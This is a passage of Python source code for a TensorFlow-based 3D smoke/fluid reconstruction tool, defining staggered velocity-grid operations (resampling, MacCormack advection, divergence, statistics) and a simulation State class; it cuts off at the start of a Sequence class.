# shape = GridShape(shape).zyx
# vel_scale = shape/v_shape #[o/i for i,o in zip(v_shape, shape)] #z,y,x
LOG.debug("scaling scalarFlow velocity from %s to %s with magnitude scale %s", v_shape, shape)
v_tmp = cls(v_shape, x=v_x, y=v_y, z=v_z, as_var=False, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name="sF_tmp", trainable=False)
v_x, v_y, v_z = v_tmp.scaled(shape, scale_magnitude=True)
# can only scale 1 and 4 channel grids
# v_x = scale_renderer.resample_grid3D_aligned(v_x, shape.value)*vel_scale.x#[2]
# v_y = scale_renderer.resample_grid3D_aligned(v_y, shape.value)*vel_scale.y#[1]
# v_z = scale_renderer.resample_grid3D_aligned(v_z, shape.value)*vel_scale.z#[0]
# velocity = tf.concat([v_x, v_y, v_z], axis=-1)
v_shape = shape
#return cls.from_centered(velocity,as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name)
return cls(v_shape, x=v_x, y=v_y, z=v_z,as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
def copy(self, as_var=None, device=None, var_name=None, trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_cpy'
if trainable is None:
trainable = self._is_trainable
grid = VelocityGrid(self.centered_shape, x=tf.identity(self._x), y=tf.identity(self._y), z=tf.identity(self._z), as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def scaled(self, centered_shape, scale_magnitude=True):
if not (isinstance(centered_shape, list) and len(centered_shape)==3):
raise ValueError("Invalid shape")
#resample velocity
if centered_shape!=self.centered_shape:
with self.scale_renderer.profiler.sample("scale velocity"):
x_shape, y_shape, z_shape = VelocityGrid.component_shapes(centered_shape)
LOG.debug("Scaling velocity from %s to %s", self.centered_shape, centered_shape)
x_scaled = self.scale_renderer.resample_grid3D_aligned(self.x, x_shape, align_x='center')
y_scaled = self.scale_renderer.resample_grid3D_aligned(self.y, y_shape, align_y='center')
z_scaled = self.scale_renderer.resample_grid3D_aligned(self.z, z_shape, align_z='center')
if scale_magnitude:
vel_scale = [o/i for i,o in zip(self.centered_shape, centered_shape)] #z,y,x
LOG.debug("Scaling velocity magnitude with %s", vel_scale)
x_scaled *= vel_scale[2]
y_scaled *= vel_scale[1]
z_scaled *= vel_scale[0]
else:
LOG.debug("No need to scale velocity to same shape %s", self.centered_shape)
x_scaled = tf.identity(self.x)
y_scaled = tf.identity(self.y)
z_scaled = tf.identity(self.z)
return x_scaled, y_scaled, z_scaled
def copy_scaled(self, centered_shape, scale_magnitude=True, as_var=None, device=None, var_name=None, trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_scaled'
if trainable is None:
trainable = self._is_trainable
x_scaled, y_scaled, z_scaled = self.scaled(centered_shape, scale_magnitude)
grid = VelocityGrid(centered_shape, x=x_scaled, y=y_scaled, z=z_scaled, as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def _lut_warp_vel(self, shape, dt=1.0):
# use to get lookup positions to warp velocity components
vel = self._sampled_to_shape(shape) #3 x 1DHW1
vel_lut = [- vel[i]*dt for i in range(len(vel))] #3 x 1DHW1
vel_lut = tf.concat(vel_lut, axis = -1) #1DHW3
return vel_lut
def _warp_vel_component(self, data, lut, order=1, dt=1.0, clamp="NONE"):
if order<1 or order>2:
raise ValueError("Unsupported warp order '{}'".format(order))
warped = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
clamp = clamp.upper()
if order==2: #MacCormack
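# MacCormack correction: advect forward, advect the result backward, and use half
# the difference between the original data and the back-advected result as an
# error estimate added to the forward-advected value.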
warped_back = self.warp_renderer._sample_LuT(warped, -lut, True, relative=True)
corrected = warped + 0.5*(data-warped_back)
if clamp=="MC" or clamp=="MC_SMOOTH":
#raise NotImplementedError("MacCormack clamping has not been implemented.")
fm = self.warp_renderer.filter_mode
self.warp_renderer.filter_mode = "MIN"
data_min = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
self.warp_renderer.filter_mode = "MAX"
data_max = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
self.warp_renderer.filter_mode = fm
if clamp=='MC':
#LOG.warning("Experimental clamp for MacCormack velocity advection.")
raise NotImplementedError("MIM and MAX warp sampling have wrong gradients.")
corrected = tf.clip_by_value(corrected, data_min, data_max)
if clamp=='MC_SMOOTH':
#LOG.warning("Experimental 'revert' clamp for MacCormack velocity advection.")
clamp_OOB = tf.logical_or(tf.less(corrected, data_min), tf.greater(corrected, data_max))
corrected = tf.where(clamp_OOB, warped, corrected)
warped = corrected
return warped
def warped(self, vel_grid=None, order=1, dt=1.0, clamp="NONE"):
if vel_grid is None:
#vel_grid = self
pass
elif not isinstance(vel_grid, VelocityGrid):
raise TypeError("Invalid VelocityGrid")
with self.warp_renderer.profiler.sample("warp velocity"):
LOG.debug("Warping velocity grid")
#TODO will cause errors if grid shapes do not match, resample if necessary?
if vel_grid is None:
lut_x = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('X', concat=False)], axis=-1)
else:
lut_x = vel_grid._lut_warp_vel(self.x_shape, dt)
x_warped = self._warp_vel_component(self.x, lut_x, order=order, dt=dt, clamp=clamp)
del lut_x
if vel_grid is None:
lut_y = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('Y', concat=False)], axis=-1)
else:
lut_y = vel_grid._lut_warp_vel(self.y_shape, dt)
y_warped = self._warp_vel_component(self.y, lut_y, order=order, dt=dt, clamp=clamp)
del lut_y
if vel_grid is None:
lut_z = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('Z', concat=False)], axis=-1)
else:
lut_z = vel_grid._lut_warp_vel(self.z_shape, dt)
z_warped = self._warp_vel_component(self.z, lut_z, order=order, dt=dt, clamp=clamp)
del lut_z
return x_warped, y_warped, z_warped
def copy_warped(self, vel_grid=None, as_var=None, order=1, dt=1.0, device=None, var_name=None, clamp="NONE", trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_warped'
if trainable is None:
trainable = self._is_trainable
x_warped, y_warped, z_warped = self.warped(vel_grid, order, dt, clamp=clamp)
grid = VelocityGrid(self.centered_shape, x=x_warped, y=y_warped, z=z_warped, as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def divergence_free(self, residual=1e-5):
raise NotImplementedError
def var_list(self):
if self.is_var:
return [self._x, self._y, self._z]
else:
raise TypeError("This VelocityGrid is not a variable.")
def get_variables(self):
if self.is_var:
return {'velocity_x': self._x, 'velocity_y': self._y, 'velocity_z': self._z}
else:
raise TypeError("This VelocityGrid is not a variable.")
def save(self, path):
np.savez_compressed(path, centered_shape=self.centered_shape, vel_x=self.x.numpy(), vel_y=self.y.numpy(), vel_z=self.z.numpy())
def assign(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign(x)
self._y.assign(y)
self._z.assign(z)
else:
with tf.device(self._device):
self._x = tf.identity(x)
self._y = tf.identity(y)
self._z = tf.identity(z)
def assign_add(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign_add(x)
self._y.assign_add(y)
self._z.assign_add(z)
else:
with tf.device(self._device):
self._x = tf.identity(self._x+x)
self._y = tf.identity(self._y+y)
self._z = tf.identity(self._z+z)
def assign_sub(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign_sub(x)
self._y.assign_sub(y)
self._z.assign_sub(z)
else:
with tf.device(self._device):
self._x = tf.identity(self._x-x)
self._y = tf.identity(self._y-y)
self._z = tf.identity(self._z-z)
def scale_magnitude(self, scale):
if np.isscalar(scale):
scale = [scale]*3
assert len(scale)==3
self.assign(self.x*scale[0],self.y*scale[1], self.z*scale[2])
def _centered_to_staggered(self, centered):
centered_shape = shape_list(centered)
assert len(centered_shape)==5
assert centered_shape[-1]==3
assert centered_shape[0]==1
assert self.centered_shape==centered_shape[-4:-1]
with self.scale_renderer.profiler.sample("centered velocity to staggered"):
x,y,z= tf.split(centered, 3, axis=-1)
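# Each centered component is resampled onto its staggered face grid; the 2/shape
# scale maps the source grid into the [-1,1] sampling cube of the target shape.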
centered_x_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.x_shape[::-1]], center=True)
centered_y_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.y_shape[::-1]], center=True)
centered_z_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.z_shape[::-1]], center=True)
# only shape important here
staggered_x_transform = GridTransform(self.x_shape)#,translation=[0.5,0,0])
staggered_y_transform = GridTransform(self.y_shape)#,translation=[0,0.5,0])
staggered_z_transform = GridTransform(self.z_shape)#,translation=[0,0,0.5])
x = tf.squeeze(self.scale_renderer._sample_transform(x, [centered_x_transform], [staggered_x_transform]),1)
y = tf.squeeze(self.scale_renderer._sample_transform(y, [centered_y_transform], [staggered_y_transform]),1)
z = tf.squeeze(self.scale_renderer._sample_transform(z, [centered_z_transform], [staggered_z_transform]),1)
return x,y,z
def _staggeredTensor_to_components(self, tensor, reverse=False):
tensor_shape = GridShape.from_tensor(tensor)
# assert len(tensor_shape)==5
assert tensor_shape.c==3
assert tensor_shape.n==1
assert np.all(np.asarray(self.centered_shape)+np.asarray([1,1,1]) == tensor_shape.xyz.as_shape()) #tensor_shape[-4:-1]
tensor = tensor_shape.normalize_tensor_shape(tensor)
components = tf.split(tensor, 3, axis=-1)
if reverse:
components = components[::-1]
x = components[0][:,:-1,:-1,:]
y = components[1][:,:-1,:,:-1]
z = components[2][:,:,:-1,:-1]
return x,y,z
def as_staggeredTensor(self, reverse=False):
z = (0,0)
p = (0,1)
components = [
tf.pad(self.x, [z,p,p,z,z]),
tf.pad(self.y, [z,p,z,p,z]),
tf.pad(self.z, [z,z,p,p,z]),
]
if reverse:
components = components[::-1]
return tf.concat(components, axis=-1)
def _sampled_to_shape(self, shape):
with self.scale_renderer.profiler.sample("velocity to shape"):
# uniform scaling, centered grids
#_sample_transform assumes the output grid to be in a centered [-1,1] cube, so scale input accordingly
# scale with output shape to get the right 0.5 offset
scale = [2./_ for _ in shape[::-1]]
staggered_x_transform = GridTransform(self.x_shape, scale=scale, center=True)
staggered_y_transform = GridTransform(self.y_shape, scale=scale, center=True)
staggered_z_transform = GridTransform(self.z_shape, scale=scale, center=True)
# only shape important here
sample_transform = GridTransform(shape)
#check if shape matches component shape to avoid sampling (e.g. for self warping)
vel_sampled = [
tf.squeeze(self.scale_renderer._sample_transform(self.x, [staggered_x_transform], [sample_transform]),1) \
if not shape==self.x_shape else tf.identity(self.x), #1DHW1
tf.squeeze(self.scale_renderer._sample_transform(self.y, [staggered_y_transform], [sample_transform]),1) \
if not shape==self.y_shape else tf.identity(self.y),
tf.squeeze(self.scale_renderer._sample_transform(self.z, [staggered_z_transform], [sample_transform]),1) \
if not shape==self.z_shape else tf.identity(self.z),
]
return vel_sampled
def centered(self, pad_lod=False, concat=True):#, shape=None):
shape = self.centered_shape
with self.warp_renderer.profiler.sample("velocity to centered"):
#vel_centered = self._sampled_to_shape(shape)#3 x 1DHW1
h = tf.constant(0.5, dtype=tf.float32)
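# Average the two opposing staggered face values along each axis to obtain
# cell-centered velocity components.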
vel_centered = [
(self.x[:,:,:,1:] + self.x[:,:,:,:-1])*h,
(self.y[:,:,1:] + self.y[:,:,:-1])*h,
(self.z[:,1:] + self.z[:,:-1])*h,
]
if pad_lod:
vel_centered.append(self.lod_pad)#4 x 1DHW1
if concat:
vel_centered = tf.concat(vel_centered, axis=-1) #1DHW[3|4]
return vel_centered
def _sampled_to_component_shape(self, component, pad_lod=False, concat=True):
# grids have the same spacing/resolution, so global/constant offset
component = component.upper()
offset_coord_from = 0.5
offset_coord_to = -0.5
with self.warp_renderer.profiler.sample("velocity to component shape"):
vel_sampled = []
# sample x
vel_sampled.append(tf.identity(self.x) if component=='X' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.x, \
offsets = [[offset_coord_from,offset_coord_to,0.0] if component=='Y' else [offset_coord_from,0.0,offset_coord_to],], \
target_shape = self.y_shape if component=='Y' else self.z_shape), 1))
# sample y
vel_sampled.append(tf.identity(self.y) if component=='Y' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.y, \
offsets = [[offset_coord_to,offset_coord_from,0.0] if component=='X' else [0.0,offset_coord_from,offset_coord_to],], \
target_shape = self.x_shape if component=='X' else self.z_shape), 1))
# sample z
vel_sampled.append(tf.identity(self.z) if component=='Z' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.z, \
offsets = [[offset_coord_to,0.0,offset_coord_from] if component=='X' else [0.0,offset_coord_to,offset_coord_from],], \
target_shape = self.x_shape if component=='X' else self.y_shape), 1))
if pad_lod:
vel_sampled.append(self.lod_pad)#4 x 1DHW1
if concat:
vel_sampled = tf.concat(vel_sampled, axis=-1) #1DHW[3|4]
return vel_sampled
def centered_lut_grid(self, dt=1.0):
vel_centered = self.centered()
#vel_lut = tf.concat([self.coords - vel_centered * dt, self.lod_pad], axis = -1)
vel_lut = vel_centered * (- dt)
return vel_lut
def warp(self, data, order=1, dt=1.0, clamp="NONE"):
with self.warp_renderer.profiler.sample("warp scalar"):
v = self.centered_lut_grid(dt)
data_shape = spacial_shape_list(data)
if data_shape!=self.centered_shape:
raise ValueError("Shape mismatch")
LOG.debug("Warping density grid")
data_warped = self.warp_renderer._sample_LuT(data, v, True, relative=True)
clamp = clamp.upper()
if order==2: #MacCormack
data_warped_back = self.warp_renderer._sample_LuT(data_warped, -v, True, relative=True)
data_corr = data_warped + 0.5*(data-data_warped_back)
if clamp=='MC' or clamp=='MC_SMOOTH': #smooth clamp
fm = self.warp_renderer.filter_mode
self.warp_renderer.filter_mode = "MIN"
data_min = self.warp_renderer._sample_LuT(data, v, True, relative=True)
self.warp_renderer.filter_mode = "MAX"
data_max = self.warp_renderer._sample_LuT(data, v, True, relative=True)
self.warp_renderer.filter_mode = fm
if clamp=='MC':
#LOG.warning("Experimental clamp for MacCormack density advection.")
raise NotImplementedError("MIM and MAX warp sampling have wrong gradients.")
data_corr = tf.clip_by_value(data_corr, data_min, data_max)
if clamp=='MC_SMOOTH':
#LOG.warning("Experimental 'revert' clamp for MacCormack density advection.")
clamp_OOB = tf.logical_or(tf.less(data_corr, data_min), tf.greater(data_corr, data_max))
data_corr = tf.where(clamp_OOB, data_warped, data_corr)
data_warped = data_corr
elif order>2:
raise ValueError("Unsupported warp order '{}'".format(order))
if clamp=='NEGATIVE':
data_warped = tf.maximum(data_warped, 0)
return data_warped
def with_buoyancy(self, value, scale_grid):
# value: [x,y,z]
# scale_grid: density 1DHW1
if isinstance(scale_grid, DensityGrid):
scale_grid = scale_grid.with_inflow() #.d
assert len(shape_list(value))==1
if not isinstance(value, (tf.Tensor, tf.Variable)):
value = tf.constant(value, dtype=tf.float32)
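# reshape the buoyancy direction to [1,1,1,1,3] so it broadcasts over the scalar density grid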
value = tf.reshape(value, [1,1,1,1,shape_list(value)[0]])
buoyancy = value*scale_grid # 1DHW3
return self + buoyancy
"""
def apply_buoyancy(self, value, scale_grid):
# value: [x,y,z]
# scale_grid: density 1DHW1
assert len(shape_list(value))==1
value = tf.reshape(tf.constant(value, dtype=tf.float32), [1,1,1,1,shape_list(value)[0]])
buoyancy = value*scale_grid # 1DHW3
self += buoyancy
"""
#centered
def divergence(self, world_scale=[1,1,1]):
#out - in per cell, per axis
x_div = self.x[:,:,:,1:,:] - self.x[:,:,:,:-1,:]
y_div = self.y[:,:,1:,:,:] - self.y[:,:,:-1,:,:]
z_div = self.z[:,1:,:,:,:] - self.z[:,:-1,:,:,:]
# sum to get total divergence per cell
div = x_div*world_scale[0]+y_div*world_scale[1]+z_div*world_scale[2]
return div
#centered
def magnitude(self, world_scale=[1,1,1]):
with self.warp_renderer.profiler.sample("magnitude"):
v = self.centered(pad_lod=False)*tf.constant(world_scale, dtype=tf.float32)
return tf_norm2(v, axis=-1, keepdims=True)
def stats(self, world_scale=[1,1,1], mask=None, state=None, **warp_kwargs):
'''
mask: optional binary float mask, stats only consider cells>0.5
'''
x = self.x
if mask is not None:
mask_x = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.x_shape, align_x='stagger_output'), 0.5)
x = tf.boolean_mask(x, mask_x)
y = self.y
if mask is not None:
mask_y = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.y_shape, align_y='stagger_output'), 0.5)
y = tf.boolean_mask(y, mask_y)
z = self.z
if mask is not None:
mask_z = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.z_shape, align_z='stagger_output'), 0.5)
z = tf.boolean_mask(z, mask_z)
if mask is not None and mask.dtype!=tf.bool:
mask = tf.greater(mask, 0.5)
divergence = self.divergence(world_scale)
if mask is not None: divergence = tf.boolean_mask(divergence, mask)
magnitude = self.magnitude(world_scale)
if mask is not None: magnitude = tf.boolean_mask(magnitude, mask)
stats = {
'divergence': tf_tensor_stats(divergence, as_dict=True),
'magnitude': tf_tensor_stats(magnitude, as_dict=True),
'velocity_x': tf_tensor_stats(x, as_dict=True),
'velocity_y': tf_tensor_stats(y, as_dict=True),
'velocity_z': tf_tensor_stats(z, as_dict=True),
'shape':self.centered_shape, 'bounds':self.outer_bounds,
}
if state is not None and state.prev is not None and state.prev.velocity is not None:
prev_warped = state.prev.velocity_advected(**warp_kwargs)
def vel_warp_SE_stats(prev, curr, mask):
warp_SE = tf.squared_difference(prev, curr)
if mask is not None:
warp_SE = tf.boolean_mask(warp_SE, mask)
return tf_tensor_stats(warp_SE, as_dict=True)
stats["warp_x_SE"] = vel_warp_SE_stats(prev_warped.x, self.x, mask_x if mask is not None else None)
stats["warp_y_SE"] = vel_warp_SE_stats(prev_warped.y, self.y, mask_y if mask is not None else None)
stats["warp_z_SE"] = vel_warp_SE_stats(prev_warped.z, self.z, mask_z if mask is not None else None)
warp_vdiff_mag = (prev_warped-self).magnitude()
if mask is not None:
warp_vdiff_mag = tf.boolean_mask(warp_vdiff_mag, mask)
stats["warp_vdiff_mag"] = tf_tensor_stats(warp_vdiff_mag, as_dict=True)
del warp_vdiff_mag
vel_CangleRad_mask = tf.greater(state.prev.velocity.magnitude() * self.magnitude(), 1e-8)
if mask is not None:
vel_CangleRad_mask = tf.logical_and(mask, vel_CangleRad_mask)
warp_CangleRad = tf_angle_between(state.prev.velocity.centered(), self.centered(), axis=-1, keepdims=True)
stats["warp_angleCM_rad"] = tf_tensor_stats(tf.boolean_mask(warp_CangleRad, vel_CangleRad_mask), as_dict=True)
del warp_CangleRad
else:
stats["warp_x_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_y_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_z_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_vdiff_mag"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_angleCM_rad"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
return stats
def __add__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
return VelocityGrid(self.centered_shape, x=self.x+other.x, y=self.y+other.y, z=self.z+other.z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
return VelocityGrid(self.centered_shape, x=self.x+x, y=self.y+y, z=self.z+z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
else:
return NotImplemented
def __iadd__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
self.assign_add(other.x, other.y, other.z)
return self
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
self.assign_add(x, y, z)
return self
else:
return NotImplemented
def __sub__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
return VelocityGrid(self.centered_shape, x=self.x-other.x, y=self.y-other.y, z=self.z-other.z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
return VelocityGrid(self.centered_shape, x=self.x-x, y=self.y-y, z=self.z-z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
else:
return NotImplemented
def __isub__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
self.assign_sub(other.x, other.y, other.z)
return self
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
self.assign_sub(x, y, z)
return self
else:
return NotImplemented
class State:
def __init__(self, density, velocity, frame, prev=None, next=None, transform=None, targets=None, targets_raw=None, bkgs=None):
self._density = None
if density is not None:
assert isinstance(density, DensityGrid)
self._density = density
self._velocity = None
if velocity is not None:
assert isinstance(velocity, VelocityGrid)
self._velocity = velocity
self.frame = frame
self.prev = prev
self.next = next
self.transform = transform
self.targets = targets
self.targets_raw = targets_raw
self.bkgs = bkgs
self.target_cameras = None
self.images = None
self.t = None
class StateIterator:
def __init__(self, state):
self.curr_state = state
def __next__(self):
if self.curr_state is not None:
state = self.curr_state
self.curr_state = state.next
return state
raise StopIteration
def __iter__(self):
return self.StateIterator(self)
@property
def density(self):
if self._density is not None:
return self._density
else:
raise AttributeError("State for frame {} does not contain density".format(self.frame))
@property
def velocity(self):
if self._velocity is not None:
return self._velocity
else:
raise AttributeError("State for frame {} does not contain velocity".format(self.frame))
@classmethod
def from_file(cls, path, frame, transform=None, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, density_filename="density.npz", velocity_filename="velocity.npz"):
density = DensityGrid.from_file(os.path.join(path, density_filename), as_var=as_var, scale_renderer=scale_renderer, device=device)
velocity = VelocityGrid.from_file(os.path.join(path, velocity_filename), as_var=as_var, \
boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
state = cls(density, velocity, frame, transform=transform)
return state
@classmethod
def from_scalarFlow_file(cls, density_path, velocity_path, frame, transform=None, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None):
density = DensityGrid.from_scalarFlow_file(density_path, as_var=as_var, scale_renderer=scale_renderer, device=device)
velocity = VelocityGrid.from_scalarFlow_file(velocity_path, as_var=as_var, \
boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
state = cls(density, velocity, frame, transform=transform)
return state
def copy(self, as_var=None, device=None):
s = State(self.density.copy(as_var=as_var, device=device), self.velocity.copy(as_var=as_var, device=device), self.frame)
m = copy.copy(self.__dict__)
del m["_velocity"]
del m["_density"]
del m["prev"]
del m["next"]
for k,v in m.items():
setattr(s,k,v)
return s
def copy_warped(self, order=1, dt=1.0, frame=None, as_var=None, targets=None, targets_raw=None, bkgs=None, device=None, clamp="NONE"):
d = self.density.copy_warped(order=order, dt=dt, as_var=as_var, device=device, clamp=clamp)
v = self.velocity.copy_warped(order=order, dt=dt, as_var=as_var, device=device, clamp=clamp)
return State(d, v, frame, transform=self.transform, targets=targets, targets_raw=targets_raw, bkgs=bkgs)
def get_density_transform(self):
if isinstance(self.transform, GridTransform):
return self.transform.copy_new_data(self.density.d)
else:
raise TypeError("state.transform is not a GridTransform")
def get_velocity_transform(self):
if isinstance(self.transform, GridTransform):
return self.transform.copy_new_data(self.velocity.lod_pad)
else:
raise TypeError("state.transform is not a GridTransform")
def render_density(self, render_ctx, custom_ops=None):
imgs = tf.concat(render_ctx.dens_renderer.render_density(self.get_density_transform(), light_list=render_ctx.lights, camera_list=self.target_cameras, cut_alpha=False, monochrome=render_ctx.monochrome, custom_ops=custom_ops), axis=0) #, background=bkg
imgs, d = tf.split(imgs, [3,1], axis=-1)
t = tf.exp(-d)
self.images = imgs
self.t = t
def density_advected(self, dt=1.0, order=1, clamp="NONE"):
return self.density.warped(self.velocity, order=order, dt=dt, clamp=clamp)#self.velocity.warp(self.density, scale_renderer)
def velocity_advected(self, dt=1.0, order=1, clamp="NONE"):
return self.velocity.copy_warped(order=order, dt=dt, as_var=False, clamp=clamp)
def rescale_density(self, shape, device=None):
self._density = self.density.copy_scaled(shape, device=device)
def rescale_velocity(self, shape, scale_magnitude=True, device=None):
self._velocity = self.velocity.copy_scaled(shape, scale_magnitude=scale_magnitude, device=device)
def rescale(self, dens_shape, vel_shape, device=None):
self.rescale_density(dens_shape, device=device)
self.rescale_velocity(vel_shape, device=device)
def var_list(self):
var_list = []
if self._density is not None:
var_list += self.density.var_list()
if self._velocity is not None:
var_list += self.velocity.var_list()
return var_list
def get_variables(self):
var_dict = {}
if self._density is not None:
var_dict.update(self.density.get_variables())
if self._velocity is not None:
var_dict.update(self.velocity.get_variables())
return var_dict
def stats(self, vel_scale=[1,1,1], mask=None, render_ctx=None, **warp_kwargs):
target_stats = None
if render_ctx is not None and getattr(self, "target_cameras", None) is not None:
target_stats = {}
self.render_density(render_ctx)
if getattr(self, "targets_raw") is not None and getattr(self, "bkgs") is not None:
target_stats["SE_raw"] = tf_tensor_stats(tf.math.squared_difference(self.images + self.bkgs*self.t, self.targets_raw), as_dict=True)
if getattr(self, "targets") is not None:
target_stats["SE"] = tf_tensor_stats(tf.math.squared_difference(self.images, self.targets), as_dict=True)
return self.density.stats(mask=mask, state=self, **warp_kwargs), self.velocity.stats(vel_scale, mask=mask, state=self, **warp_kwargs), target_stats
def save(self, path, suffix=None):
self.density.save(os.path.join(path, 'density.npz' if suffix is None else 'density_'+suffix+'.npz'))
self.velocity.save(os.path.join(path, 'velocity.npz' if suffix is None else 'velocity_'+suffix+'.npz'))
class Sequence:
def __init__(self, states):
